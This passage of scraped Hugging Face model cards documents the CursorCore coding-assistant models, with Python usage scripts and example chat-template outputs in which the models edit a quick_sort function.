torch_dtype=torch.bfloat16,
device_map="auto"
)
sample = {
"history": [
{
"type": "code",
"lang": "python",
"code": """def quick_sort(arr):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
}
],
"current": {
"type": "code",
"lang": "python",
"code": """def quick_sort(array):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
},
"user": ""
}
prompt = tokenizer.apply_chat_template(
prepare_input_for_wf(sample),
tokenize=False,
chat_template="assistant-conversation",
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512, do_sample=False)
print(tokenizer.decode(outputs[0]))
````
Output 1:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>history
```python
def quick_sort(arr):
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>current
```python
def quick_sort(array):
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>assistant
<|next_start|>```python
def quick_sort(array):
if len(array) <= 1:
return array
pivot = array[len(array) // 2]
left = [x for x in array if x < pivot]
middle = [x for x in array if x == pivot]
right = [x for x in array if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|next_end|>
The user has provided a revised code change that corrects the parameter name from `arr` to `array` in the `quick_sort` function. This change ensures consistency in the function definition and avoids potential confusion or errors.
To implement this, we will:
1. Update the parameter name in the function definition from `arr` to `array`.
2. Ensure that all references to `arr` within the function are updated to `array`.
This will make the function definition and internal references consistent, improving code readability and maintainability.<|im_end|>
````
Script 2:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
from eval.utils import prepare_input_for_wf
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-9B")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-9B",
torch_dtype=torch.bfloat16,
device_map="auto"
)
sample = {
"history": [],
"current": {
"type": "code",
"lang": "python",
"code": """def quick_sort(array):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
},
"user": "Add Docstring."
}
prompt = tokenizer.apply_chat_template(
prepare_input_for_wf(sample),
tokenize=False,
chat_template="assistant-conversation",
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512, do_sample=False)
print(tokenizer.decode(outputs[0]))
````
Output 2:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>current
```python
def quick_sort(array):
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>user
Add Docstring.<|im_end|>
<|im_start|>assistant
<|next_start|>```python
def quick_sort(array):
"""
This is an implementation of the quick sort algorithm.
"""
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|next_end|><|im_end|>
````
For models in Locate-and-Change (LC) and Search-and-Replace (SR) formats, the output examples are as follows:
Script for LC:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
from eval.utils import prepare_input_for_lc
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-1.5B-LC")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-1.5B-LC",
torch_dtype=torch.bfloat16,
device_map="auto"
)
sample = {
"history": [],
"current": {
"type": "code",
"lang": "python",
"code": """def quick_sort(array):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
},
"user": "Add Docstring."
}
prompt = tokenizer.apply_chat_template(
prepare_input_for_lc(sample),
tokenize=False,
chat_template="assistant-conversation",
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512, do_sample=False)
print(tokenizer.decode(outputs[0]))
````
Output for LC:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>current
```python
1 def quick_sort(array):
2 if len(arr) <= 1:
3 return arr
4 pivot = arr[len(arr) // 2]
5 left = [x for x in arr if x < pivot]
6 middle = [x for x in arr if x == pivot]
7 right = [x for x in arr if x > pivot]
8 return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>user
Add Docstring.<|im_end|>
<|im_start|>assistant
<|next_start|>1,1
```
'''This function will sort an array using quick sort algorithm'''
```<|next_end|>
To enhance the readability and maintainability of the code, we should add a docstring to the `quick_sort` function. A docstring provides a clear description of what the function does, which is particularly useful for other developers who might use or modify this code in the future.
The docstring will be added immediately after the function definition, explaining that the function uses the quick sort algorithm to sort an array. This will make the code more self-explanatory and easier to understand.
Here's the plan:
1. Add a docstring at the beginning of the `quick_sort` function.
2. Ensure the docstring is clear and concise, describing the purpose of the function.
This modification will improve the code's documentation without altering its functionality.<|im_end|>
````
Script for SR:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
from eval.utils import prepare_input_for_sr
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-1.5B-SR")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-1.5B-SR",
torch_dtype=torch.bfloat16,
device_map="auto"
)
sample = {
"history": [],
"current": {
"type": "code",
"lang": "python",
"code": """def quick_sort(array):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
},
"user": "Add Docstring."
}
prompt = tokenizer.apply_chat_template(
prepare_input_for_sr(sample),
tokenize=False,
chat_template="assistant-conversation",
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512, do_sample=False)
print(tokenizer.decode(outputs[0]))
````
Output for SR:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>current
```python
def quick_sort(array):
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>user
Add Docstring.<|im_end|>
<|im_start|>assistant
<|next_start|>```python
def quick_sort(array):
<|search_and_replace|>
def quick_sort(array):
"""
This function implements quick sort algorithm
"""
```<|next_end|><|im_end|>
````
### 3) Web Demo
We have created a web demo for CursorCore. Please visit [CursorWeb](https://github.com/TechxGenus/CursorWeb) for more details.
## Future Work
CursorCore is still in a very early stage, and lots of work is needed to achieve a better user experience. For example:
- Repository-level editing support
- Better and faster editing formats
- Better user interface and presentation
- ...
## Citation
```bibtex
@article{jiang2024cursorcore,
title = {CursorCore: Assist Programming through Aligning Anything},
author = {Hao Jiang and Qi Liu and Rui Li and Shengyu Ye and Shijin Wang},
year = {2024},
journal = {arXiv preprint arXiv: 2410.07002}
}
```
## Contribution
Contributions are welcome! If you find any bugs or have suggestions for improvements, please open an issue or submit a pull request.
|
TechxGenus/CursorCore-Yi-1.5B-GPTQ | TechxGenus | 2024-10-10T06:39:32Z | 79 | 0 | transformers | [
"transformers",
"safetensors",
"llama",
"text-generation",
"code",
"conversational",
"arxiv:2410.07002",
"base_model:TechxGenus/CursorCore-Yi-1.5B",
"base_model:quantized:TechxGenus/CursorCore-Yi-1.5B",
"license:apache-2.0",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"4-bit",
"gptq",
"region:us"
] | text-generation | 2024-10-08T04:59:59Z | ---
tags:
- code
base_model:
- TechxGenus/CursorCore-Yi-1.5B
library_name: transformers
pipeline_tag: text-generation
license: apache-2.0
---
# CursorCore: Assist Programming through Aligning Anything
<p align="center">
<a href="http://arxiv.org/abs/2410.07002">[📄arXiv]</a> |
<a href="https://hf.co/papers/2410.07002">[🤗HF Paper]</a> |
<a href="https://huggingface.co/collections/TechxGenus/cursorcore-series-6706618c38598468866b60e2">[🤖Models]</a> |
<a href="https://github.com/TechxGenus/CursorCore">[🛠️Code]</a> |
<a href="https://github.com/TechxGenus/CursorWeb">[Web]</a> |
<a href="https://discord.gg/Z5Tev8fV">[Discord]</a>
</p>
<hr>
- [CursorCore: Assist Programming through Aligning Anything](#cursorcore-assist-programming-through-aligning-anything)
- [Introduction](#introduction)
- [Models](#models)
- [Usage](#usage)
- [1) Normal chat](#1-normal-chat)
- [2) Assistant-Conversation](#2-assistant-conversation)
- [3) Web Demo](#3-web-demo)
- [Future Work](#future-work)
- [Citation](#citation)
- [Contribution](#contribution)
<hr>
## Introduction
CursorCore is a series of open-source models designed for AI-assisted programming. It aims to support features such as automated editing and inline chat, replicating the core abilities of closed-source AI-assisted programming tools like Cursor. This is achieved by aligning data generated through Programming-Instruct. Please read [our paper](http://arxiv.org/abs/2410.07002) to learn more.
<p align="center">
<img width="100%" alt="conversation" src="https://raw.githubusercontent.com/TechxGenus/CursorCore/main/pictures/conversation.png">
</p>

## Models
Our models have been open-sourced on Hugging Face. You can access them here: [CursorCore-Series](https://huggingface.co/collections/TechxGenus/cursorcore-series-6706618c38598468866b60e2). We also provide pre-quantized GPTQ and AWQ weights here: [CursorCore-Quantization](https://huggingface.co/collections/TechxGenus/cursorcore-quantization-67066431f29f252494ee8cf3).
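This repository contains the GPTQ-quantized weights of CursorCore-Yi-1.5B. As a minimal sketch (assuming a GPTQ backend such as `optimum` with `auto-gptq` is installed, which is not covered by the scripts below), the quantized checkpoint can likely be loaded the same way as the full-precision models:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM

# Assumption: a GPTQ backend (e.g. optimum + auto-gptq) is installed so the
# quantized checkpoint can be loaded on GPU.
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-1.5B-GPTQ")
model = AutoModelForCausalLM.from_pretrained(
    "TechxGenus/CursorCore-Yi-1.5B-GPTQ",
    torch_dtype=torch.float16,  # GPTQ kernels typically run in fp16
    device_map="auto"
)
````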
## Usage
Here are some examples of how to use our model:
### 1) Normal chat
Script:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-9B")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-9B",
torch_dtype=torch.bfloat16,
device_map="auto"
)
messages = [
{"role": "user", "content": "Hi!"},
]
prompt = tokenizer.apply_chat_template(
messages,
tokenize=False,
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512)
print(tokenizer.decode(outputs[0]))
````
Output:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>user
Hi!<|im_end|>
<|im_start|>assistant
Hello! I'm an AI language model and I can help you with any programming questions you might have. What specific problem or task are you trying to solve?<|im_end|>
````
### 2) Assistant-Conversation
In our work, we introduce a new framework for AI-assisted programming tasks. It is designed to align anything during the programming process, and it is used to implement features such as Tab and Inline Chat.
Script 1:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
from eval.utils import prepare_input_for_wf
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-9B")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-9B",
torch_dtype=torch.bfloat16,
device_map="auto"
)
sample = {
"history": [
{
"type": "code",
"lang": "python",
"code": """def quick_sort(arr):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
}
],
"current": {
"type": "code",
"lang": "python",
"code": """def quick_sort(array):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
},
"user": ""
}
prompt = tokenizer.apply_chat_template(
prepare_input_for_wf(sample),
tokenize=False,
chat_template="assistant-conversation",
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512, do_sample=False)
print(tokenizer.decode(outputs[0]))
````
Output 1:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>history
```python
def quick_sort(arr):
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>current
```python
def quick_sort(array):
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>assistant
<|next_start|>```python
def quick_sort(array):
if len(array) <= 1:
return array
pivot = array[len(array) // 2]
left = [x for x in array if x < pivot]
middle = [x for x in array if x == pivot]
right = [x for x in array if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|next_end|>
The user has provided a revised code change that corrects the parameter name from `arr` to `array` in the `quick_sort` function. This change ensures consistency in the function definition and avoids potential confusion or errors.
To implement this, we will:
1. Update the parameter name in the function definition from `arr` to `array`.
2. Ensure that all references to `arr` within the function are updated to `array`.
This will make the function definition and internal references consistent, improving code readability and maintainability.<|im_end|>
````
Script 2:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
from eval.utils import prepare_input_for_wf
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-9B")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-9B",
torch_dtype=torch.bfloat16,
device_map="auto"
)
sample = {
"history": [],
"current": {
"type": "code",
"lang": "python",
"code": """def quick_sort(array):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
},
"user": "Add Docstring."
}
prompt = tokenizer.apply_chat_template(
prepare_input_for_wf(sample),
tokenize=False,
chat_template="assistant-conversation",
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512, do_sample=False)
print(tokenizer.decode(outputs[0]))
````
Output 2:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>current
```python
def quick_sort(array):
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>user
Add Docstring.<|im_end|>
<|im_start|>assistant
<|next_start|>```python
def quick_sort(array):
"""
This is an implementation of the quick sort algorithm.
"""
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|next_end|><|im_end|>
````
For models in Locate-and-Change (LC) and Search-and-Replace (SR) formats, the output examples are as follows:
Script for LC:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
from eval.utils import prepare_input_for_lc
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-1.5B-LC")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-1.5B-LC",
torch_dtype=torch.bfloat16,
device_map="auto"
)
sample = {
"history": [],
"current": {
"type": "code",
"lang": "python",
"code": """def quick_sort(array):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
},
"user": "Add Docstring."
}
prompt = tokenizer.apply_chat_template(
prepare_input_for_lc(sample),
tokenize=False,
chat_template="assistant-conversation",
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512, do_sample=False)
print(tokenizer.decode(outputs[0]))
````
Output for LC:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>current
```python
1 def quick_sort(array):
2 if len(arr) <= 1:
3 return arr
4 pivot = arr[len(arr) // 2]
5 left = [x for x in arr if x < pivot]
6 middle = [x for x in arr if x == pivot]
7 right = [x for x in arr if x > pivot]
8 return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>user
Add Docstring.<|im_end|>
<|im_start|>assistant
<|next_start|>1,1
```
'''This function will sort an array using quick sort algorithm'''
```<|next_end|>
To enhance the readability and maintainability of the code, we should add a docstring to the `quick_sort` function. A docstring provides a clear description of what the function does, which is particularly useful for other developers who might use or modify this code in the future.
The docstring will be added immediately after the function definition, explaining that the function uses the quick sort algorithm to sort an array. This will make the code more self-explanatory and easier to understand.
Here's the plan:
1. Add a docstring at the beginning of the `quick_sort` function.
2. Ensure the docstring is clear and concise, describing the purpose of the function.
This modification will improve the code's documentation without altering its functionality.<|im_end|>
````
Script for SR:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
from eval.utils import prepare_input_for_sr
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-1.5B-SR")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-1.5B-SR",
torch_dtype=torch.bfloat16,
device_map="auto"
)
sample = {
"history": [],
"current": {
"type": "code",
"lang": "python",
"code": """def quick_sort(array):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
},
"user": "Add Docstring."
}
prompt = tokenizer.apply_chat_template(
prepare_input_for_sr(sample),
tokenize=False,
chat_template="assistant-conversation",
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512, do_sample=False)
print(tokenizer.decode(outputs[0]))
````
Output for SR:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>current
```python
def quick_sort(array):
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>user
Add Docstring.<|im_end|>
<|im_start|>assistant
<|next_start|>```python
def quick_sort(array):
<|search_and_replace|>
def quick_sort(array):
"""
This function implements quick sort algorithm
"""
```<|next_end|><|im_end|>
````
### 3) Web Demo
We have created a web demo for CursorCore. Please visit [CursorWeb](https://github.com/TechxGenus/CursorWeb) for more details.
## Future Work
CursorCore is still in a very early stage, and lots of work is needed to achieve a better user experience. For example:
- Repository-level editing support
- Better and faster editing formats
- Better user interface and presentation
- ...
## Citation
```bibtex
@article{jiang2024cursorcore,
title = {CursorCore: Assist Programming through Aligning Anything},
author = {Hao Jiang and Qi Liu and Rui Li and Shengyu Ye and Shijin Wang},
year = {2024},
journal = {arXiv preprint arXiv: 2410.07002}
}
```
## Contribution
Contributions are welcome! If you find any bugs or have suggestions for improvements, please open an issue or submit a pull request.
|
TechxGenus/CursorCore-DS-6.7B | TechxGenus | 2024-10-10T06:38:41Z | 5 | 0 | transformers | [
"transformers",
"safetensors",
"llama",
"text-generation",
"code",
"conversational",
"arxiv:2410.07002",
"base_model:deepseek-ai/deepseek-coder-6.7b-base",
"base_model:finetune:deepseek-ai/deepseek-coder-6.7b-base",
"license:other",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2024-10-05T11:15:35Z | ---
tags:
- code
base_model:
- deepseek-ai/deepseek-coder-6.7b-base
library_name: transformers
pipeline_tag: text-generation
license: other
license_name: deepseek
license_link: LICENSE
---
# CursorCore: Assist Programming through Aligning Anything
<p align="center">
<a href="http://arxiv.org/abs/2410.07002">[📄arXiv]</a> |
<a href="https://hf.co/papers/2410.07002">[🤗HF Paper]</a> |
<a href="https://huggingface.co/collections/TechxGenus/cursorcore-series-6706618c38598468866b60e2">[🤖Models]</a> |
<a href="https://github.com/TechxGenus/CursorCore">[🛠️Code]</a> |
<a href="https://github.com/TechxGenus/CursorWeb">[Web]</a> |
<a href="https://discord.gg/Z5Tev8fV">[Discord]</a>
</p>
<hr>
- [CursorCore: Assist Programming through Aligning Anything](#cursorcore-assist-programming-through-aligning-anything)
- [Introduction](#introduction)
- [Models](#models)
- [Usage](#usage)
- [1) Normal chat](#1-normal-chat)
- [2) Assistant-Conversation](#2-assistant-conversation)
- [3) Web Demo](#3-web-demo)
- [Future Work](#future-work)
- [Citation](#citation)
- [Contribution](#contribution)
<hr>
## Introduction
CursorCore is a series of open-source models designed for AI-assisted programming. It aims to support features such as automated editing and inline chat, replicating the core abilities of closed-source AI-assisted programming tools like Cursor. This is achieved by aligning data generated through Programming-Instruct. Please read [our paper](http://arxiv.org/abs/2410.07002) to learn more.
<p align="center">
<img width="100%" alt="conversation" src="https://raw.githubusercontent.com/TechxGenus/CursorCore/main/pictures/conversation.png">
</p>

## Models
Our models have been open-sourced on Hugging Face. You can access them here: [CursorCore-Series](https://huggingface.co/collections/TechxGenus/cursorcore-series-6706618c38598468866b60e2). We also provide pre-quantized GPTQ and AWQ weights here: [CursorCore-Quantization](https://huggingface.co/collections/TechxGenus/cursorcore-quantization-67066431f29f252494ee8cf3).
## Usage
Here are some examples of how to use our model:
### 1) Normal chat
Script:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-9B")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-9B",
torch_dtype=torch.bfloat16,
device_map="auto"
)
messages = [
{"role": "user", "content": "Hi!"},
]
prompt = tokenizer.apply_chat_template(
messages,
tokenize=False,
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512)
print(tokenizer.decode(outputs[0]))
````
Output:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>user
Hi!<|im_end|>
<|im_start|>assistant
Hello! I'm an AI language model and I can help you with any programming questions you might have. What specific problem or task are you trying to solve?<|im_end|>
````
### 2) Assistant-Conversation
In our work, we introduce a new framework for AI-assisted programming tasks. It is designed to align anything during the programming process, and it is used to implement features such as Tab and Inline Chat.
Script 1:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
from eval.utils import prepare_input_for_wf
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-9B")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-9B",
torch_dtype=torch.bfloat16,
device_map="auto"
)
sample = {
"history": [
{
"type": "code",
"lang": "python",
"code": """def quick_sort(arr):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
}
],
"current": {
"type": "code",
"lang": "python",
"code": """def quick_sort(array):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
},
"user": ""
}
prompt = tokenizer.apply_chat_template(
prepare_input_for_wf(sample),
tokenize=False,
chat_template="assistant-conversation",
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512, do_sample=False)
print(tokenizer.decode(outputs[0]))
````
Output 1:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>history
```python
def quick_sort(arr):
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>current
```python
def quick_sort(array):
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>assistant
<|next_start|>```python
def quick_sort(array):
if len(array) <= 1:
return array
pivot = array[len(array) // 2]
left = [x for x in array if x < pivot]
middle = [x for x in array if x == pivot]
right = [x for x in array if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|next_end|>
The user has provided a revised code change that corrects the parameter name from `arr` to `array` in the `quick_sort` function. This change ensures consistency in the function definition and avoids potential confusion or errors.
To implement this, we will:
1. Update the parameter name in the function definition from `arr` to `array`.
2. Ensure that all references to `arr` within the function are updated to `array`.
This will make the function definition and internal references consistent, improving code readability and maintainability.<|im_end|>
````
Script 2:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
from eval.utils import prepare_input_for_wf
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-9B")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-9B",
torch_dtype=torch.bfloat16,
device_map="auto"
)
sample = {
"history": [],
"current": {
"type": "code",
"lang": "python",
"code": """def quick_sort(array):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
},
"user": "Add Docstring."
}
prompt = tokenizer.apply_chat_template(
prepare_input_for_wf(sample),
tokenize=False,
chat_template="assistant-conversation",
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512, do_sample=False)
print(tokenizer.decode(outputs[0]))
````
Output 2:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>current
```python
def quick_sort(array):
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>user
Add Docstring.<|im_end|>
<|im_start|>assistant
<|next_start|>```python
def quick_sort(array):
"""
This is an implementation of the quick sort algorithm.
"""
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|next_end|><|im_end|>
````
For models in Locate-and-Change (LC) and Search-and-Replace (SR) formats, the output examples are as follows:
Script for LC:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
from eval.utils import prepare_input_for_lc
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-1.5B-LC")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-1.5B-LC",
torch_dtype=torch.bfloat16,
device_map="auto"
)
sample = {
"history": [],
"current": {
"type": "code",
"lang": "python",
"code": """def quick_sort(array):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
},
"user": "Add Docstring."
}
prompt = tokenizer.apply_chat_template(
prepare_input_for_lc(sample),
tokenize=False,
chat_template="assistant-conversation",
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512, do_sample=False)
print(tokenizer.decode(outputs[0]))
````
Output for LC:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>current
```python
1 def quick_sort(array):
2 if len(arr) <= 1:
3 return arr
